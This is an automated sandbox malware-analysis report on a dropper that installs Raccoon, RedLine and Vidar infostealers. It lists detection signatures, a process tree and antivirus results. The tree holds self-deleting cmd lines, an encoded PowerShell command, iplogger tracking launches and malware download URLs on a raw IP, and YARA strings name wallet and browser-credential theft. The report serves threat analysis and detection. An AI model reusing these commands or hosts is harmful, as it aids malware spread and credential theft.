Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
q1wLT3xKiY.exe

Overview

General Information

Sample Name:q1wLT3xKiY.exe
Analysis ID:688997
MD5:45597a36ace0c0df1890299d8d82d938
SHA1:285a4ee677b9f7675a0fffe9813488fcdeff7948
SHA256:dd0145067f81bf5aff9a7ee7eb56c11a98a5f69a9bdbc36744919ee49890de5a
Tags:exeRecordBreaker
Infos:

Detection

CryptOne, Raccoon Stealer v2, RedLine, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected CryptOne packer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Yara detected MSILDownloaderGeneric
Multi AV Scanner detection for dropped file
Connects to many ports of the same IP (likely port scanning)
Encrypted powershell cmdline option found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected Generic Downloader
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Uses taskkill to terminate processes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • q1wLT3xKiY.exe (PID: 1808 cmdline: "C:\Users\user\Desktop\q1wLT3xKiY.exe" MD5: 45597A36ACE0C0DF1890299D8D82D938)
    • chrome.exe (PID: 5960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 6336 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1852 --field-trial-handle=1800,i,4002354000526200566,13683174315975428069,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 1576 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 6192 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 7492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4528 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 6092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8304 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 4728 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7704 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 8140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7968 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 4504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4528 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 5384 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 6640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1780,i,2243672671988617880,5445177111515229420,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 6152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 8052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1828,i,6770499846379427692,11301094581731792919,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 6384 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 6444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1808,i,14561123893253289643,1012939592416384631,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 6756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 5156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1712,i,17276114921128893629,13810006438660092211,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 7136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 7448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1940 --field-trial-handle=1732,i,11424558033472135501,3208527025666120732,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 7664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • chrome.exe (PID: 4776 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1816,i,4998864990956341523,321811726047907557,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • F0geI.exe (PID: 7840 cmdline: "C:\Program Files (x86)\Company\NewProduct\F0geI.exe" MD5: 501E0F6FA90340E3D7FF26F276CD582E)
    • kukurzka9000.exe (PID: 7956 cmdline: "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe" MD5: 3EC059BD19D6655BA83AE1E644B80510)
    • namdoitntn.exe (PID: 4940 cmdline: "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe" MD5: BBD8EA73B7626E0CA5B91D355DF39B7F)
    • real.exe (PID: 5308 cmdline: "C:\Program Files (x86)\Company\NewProduct\real.exe" MD5: E0C8728412F5F7E97698C72DA925C5E6)
      • cmd.exe (PID: 4432 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im real.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\real.exe" & del C:\PrograData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 3536 cmdline: taskkill /im real.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • timeout.exe (PID: 8164 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • safert44.exe (PID: 5840 cmdline: "C:\Program Files (x86)\Company\NewProduct\safert44.exe" MD5: 414FFD7094C0F50662FFA508CA43B7D0)
    • jshainx.exe (PID: 6160 cmdline: "C:\Program Files (x86)\Company\NewProduct\jshainx.exe" MD5: 2647A5BE31A41A39BF2497125018DBCE)
    • brokerius.exe (PID: 7612 cmdline: "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" MD5: F5D13E361F8B9ACA7103CB46B441034B)
      • cmd.exe (PID: 1804 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im brokerius.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" & del C:\PrograData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 8152 cmdline: taskkill /im brokerius.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • timeout.exe (PID: 5896 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • captain09876.exe (PID: 6696 cmdline: "C:\Program Files (x86)\Company\NewProduct\captain09876.exe" MD5: CE94CE7DE8279ECF9519B12F124543C3)
      • SETUP_~1.EXE (PID: 6132 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE MD5: CE25658AC9291C713590B834D96406BB)
        • powershell.exe (PID: 6816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ordo_sec666.exe (PID: 7048 cmdline: "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe" MD5: 63FD052610279F9EB9F1FEE8E262F2A4)
    • WW1.exe (PID: 7760 cmdline: "C:\Program Files (x86)\Company\NewProduct\WW1.exe" MD5: 86C2F03BBB61BDCAF1AE4BFB22CC2D31)
      • cmd.exe (PID: 488 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im WW1.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\WW1.exe" & del C:\PrograData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 7004 cmdline: taskkill /im WW1.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • timeout.exe (PID: 4864 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • rundll32.exe (PID: 8036 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\Company\NewProduct\jshainx.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    C:\Program Files (x86)\Company\NewProduct\jshainx.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Program Files (x86)\Company\NewProduct\jshainx.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x19ca8:$pat14: , CommandLine:
      • 0x12ccd:$v2_1: ListOfProcesses
      • 0x12a8d:$v4_3: base64str
      • 0x136d1:$v4_4: stringKey
      • 0x1123f:$v4_5: BytesToStringConverted
      • 0x1033a:$v4_6: FromBase64
      • 0x117b2:$v4_8: procName
      • 0x11ac8:$v5_1: DownloadAndExecuteUpdate
      • 0x12964:$v5_2: ITaskProcessor
      • 0x11ab6:$v5_3: CommandLineUpdate
      • 0x11aa7:$v5_4: DownloadUpdate
      • 0x11eab:$v5_5: FileScanning
      • 0x11460:$v5_7: RecordHeaderField
      • 0x110c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
      C:\Program Files (x86)\Company\NewProduct\jshainx.exeWindows_Trojan_RedLineStealer_3d9371fdunknownunknown
      • 0x13703:$a1: get_encrypted_key
      • 0x12dfc:$a2: get_PassedPaths
      • 0x1182a:$a3: ChromeGetLocalName
      • 0x13006:$a4: GetBrowsers
      • 0x19a38:$a5: Software\Valve\SteamLogin Data
      • 0x192d8:$a6: %appdata%\
      • 0x12b21:$a7: ScanPasswords
      C:\Program Files (x86)\Company\NewProduct\WW1.exeWindows_Trojan_Vidar_114258d5unknownunknown
      • 0x38f18:$a2: *wallet*.dat
      • 0x393a9:$b1: CC\%s_%s.txt
      • 0x390a9:$b2: History\%s_%s.txt
      • 0x39095:$b3: Autofill\%s_%s.txt
      Click to see the 4 entries
      SourceRuleDescriptionAuthorStrings
      0000000E.00000003.367804271.0000000000711000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
        0000000E.00000002.462192627.00000000006D8000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x46fd:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000016.00000002.415807819.0000000001264000.00000002.00000001.01000000.0000000A.sdmpWindows_Trojan_Vidar_114258d5unknownunknown
        • 0x6b38:$a2: *wallet*.dat
        • 0x6fc1:$b1: CC\%s_%s.txt
        • 0x6cc9:$b2: History\%s_%s.txt
        • 0x6cb5:$b3: Autofill\%s_%s.txt
        00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
          00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
            Click to see the 62 entries
            SourceRuleDescriptionAuthorStrings
            14.2.F0geI.exe.5d0e67.1.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
              16.2.kukurzka9000.exe.400000.0.raw.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
                16.2.kukurzka9000.exe.2390174.1.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
                  16.2.kukurzka9000.exe.2390174.1.raw.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
                    23.0.safert44.exe.420000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                    • 0x1c60:$pat14: , CommandLine:
                    • 0x25b6b:$v2_1: ListOfProcesses
                    • 0x25920:$v4_3: base64str
                    • 0x265de:$v4_4: stringKey
                    • 0x23fa6:$v4_5: BytesToStringConverted
                    • 0x23080:$v4_6: FromBase64
                    • 0x24537:$v4_8: procName
                    • 0x24867:$v5_1: DownloadAndExecuteUpdate
                    • 0x257f7:$v5_2: ITaskProcessor
                    • 0x24855:$v5_3: CommandLineUpdate
                    • 0x24846:$v5_4: DownloadUpdate
                    • 0x24cbd:$v5_5: FileScanning
                    • 0x241cd:$v5_7: RecordHeaderField
                    • 0x23e0e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                    Click to see the 22 entries
                    No Sigma rule has matched
                    Timestamp:192.168.2.645.95.11.15849800802038485 08/23/22-18:26:09.300558
                    SID:2038485
                    Source Port:49800
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.645.95.11.15849800802038486 08/23/22-18:26:30.932075
                    SID:2038486
                    Source Port:49800
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.645.95.11.15849800802038487 08/23/22-18:26:30.932075
                    SID:2038487
                    Source Port:49800
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.645.95.11.15849800802036934 08/23/22-18:26:09.300558
                    SID:2036934
                    Source Port:49800
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:45.95.11.158192.168.2.680498002036955 08/23/22-18:26:09.606665
                    SID:2036955
                    Source Port:80
                    Destination Port:49800
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://62.204.41.126:80Avira URL Cloud: Label: malware
                    Source: http://62.204.41.126/0659920757.zipAvira URL Cloud: Label: malware
                    Source: http://62.204.41.126:80/0659920757.ziphAvira URL Cloud: Label: malware
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeAvira: detection malicious, Label: HEUR/AGEN.1251247
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeAvira: detection malicious, Label: HEUR/AGEN.1250598
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeAvira: detection malicious, Label: HEUR/AGEN.1250598
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeAvira: detection malicious, Label: HEUR/AGEN.1250598
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeAvira: detection malicious, Label: HEUR/AGEN.1203016
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeAvira: detection malicious, Label: HEUR/AGEN.1251247
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeMetadefender: Detection: 64%Perma Link
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeReversingLabs: Detection: 96%
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeReversingLabs: Detection: 57%
                    Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exeMetadefender: Detection: 36%Perma Link
                    Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exeReversingLabs: Detection: 38%
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeMetadefender: Detection: 45%Perma Link
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeReversingLabs: Detection: 100%
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeReversingLabs: Detection: 43%
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeReversingLabs: Detection: 87%
                    Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exeMetadefender: Detection: 45%Perma Link
                    Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exeReversingLabs: Detection: 42%
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeReversingLabs: Detection: 80%
                    Source: q1wLT3xKiY.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00403236 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,14_2_00403236
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_004027B8 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,14_2_004027B8
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00402CB8 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,CopyFileW,CopyFileW,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,14_2_00402CB8
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00406468 LocalAlloc,CryptStringToBinaryA,lstrlen,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree,14_2_00406468
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_004017FA CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,14_2_004017FA
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040177F CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree,14_2_0040177F
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00406468 LocalAlloc,CryptStringToBinaryA,lstrlen,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree,16_2_00406468
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_004017FA CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,16_2_004017FA
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_0040177F CryptBinaryToStringW,LocalAlloc,VirtualAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree,16_2_0040177F
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00403236 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,16_2_00403236
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_004027B8 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,16_2_004027B8
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00402CB8 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,CopyFileW,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,16_2_00402CB8

                    Compliance

                    barindex
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeUnpacked PE file: 14.2.F0geI.exe.400000.0.unpack
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeUnpacked PE file: 16.2.kukurzka9000.exe.400000.0.unpack
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeUnpacked PE file: 22.2.real.exe.60900000.1.unpack
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeUnpacked PE file: 26.2.brokerius.exe.60900000.1.unpack
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeUnpacked PE file: 31.2.WW1.exe.60900000.1.unpack
                    Source: q1wLT3xKiY.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
